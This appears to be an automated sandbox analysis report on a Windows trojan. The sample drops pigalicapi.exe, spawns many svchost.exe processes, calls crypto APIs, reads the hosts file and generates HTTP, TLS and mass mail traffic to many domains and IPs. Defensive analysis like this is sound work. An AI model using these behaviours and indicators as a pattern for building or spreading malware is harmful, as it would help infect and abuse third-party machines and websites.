                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50143 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:50153 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50205 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:50206 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:50232 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50293 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50315 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50314 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:50274 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:50316 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:50319 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:50328 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:51189 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:52021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53629 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:53662 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53343 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:53761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:53822 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:53819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:53915 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:53931 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:55181 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:55278 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:56144 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:56207 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:59805 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60568 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:60665 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60953 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:61710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:61785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62444 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:62294 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:62475 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:62498 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:62500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62536 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62529 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62544 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:62578 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:62542 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:62560 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:22763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:22849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:23522 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:24097 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:24451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:24424 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:24947 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:25237 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:25239 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:25909 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:24562 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:26500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:26920 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:27376 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:27407 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 65
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_024E8A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_024E8800
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_024E8970
                      Source: 6gjnnBAbpc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00E600000_2_00E60000
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00A200001_2_00A20000
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00402075 LoadIconA,LoadCursorA,LoadIconA,LoadIconA,RegisterClassExA,MessageBoxA,CreateWindowExA,CreateWindowExA,MessageBoxA,ShowWindow,ExitProcess,memset,NtQueueApcThread,RtlQueueApcWow64Thread,NtTestAlert,UpdateWindow,TranslateMessage,DispatchMessageA,GetMessageA,0_2_00402075
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,0_2_00401EBB
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00404A1C zWTIymdDMskIqeLktgG,0_2_00404A1C
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00404CA6 ZWBgoqgZPM,0_2_00404CA6
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00401E50 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,0_2_00401E50
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00402075 LoadIconA,LoadCursorA,LoadIconA,LoadIconA,RegisterClassExA,MessageBoxA,CreateWindowExA,CreateWindowExA,MessageBoxA,ShowWindow,ExitProcess,memset,NtQueueApcThread,RtlQueueApcWow64Thread,NtTestAlert,UpdateWindow,TranslateMessage,DispatchMessageA,GetMessageA,1_2_00402075
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,1_2_00401EBB
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00404A1C zWTIymdDMskIqeLktgG,1_2_00404A1C
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00404CA6 ZWBgoqgZPM,1_2_00404CA6
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00401E50 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,1_2_00401E50
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\pigalicapi.exe 987204CA82337F0A3F28097A5D66D5F3ECB11D43D82F67CD753D0BF2CE40B7A7
                      Source: 6gjnnBAbpc.exeVirustotal: Detection: 17%
                      Source: 6gjnnBAbpc.exeReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile read: C:\Users\user\Desktop\6gjnnBAbpc.exeJump to behavior
                      Source: 6gjnnBAbpc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\6gjnnBAbpc.exe C:\Users\user\Desktop\6gjnnBAbpc.exe
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@37/4@2693/100
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_cancelling_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeMutant created: \Sessions\1\BaseNamedObjects\pigalicapi
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                      Source: C:\Users\user\pigalicapi.exeMutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
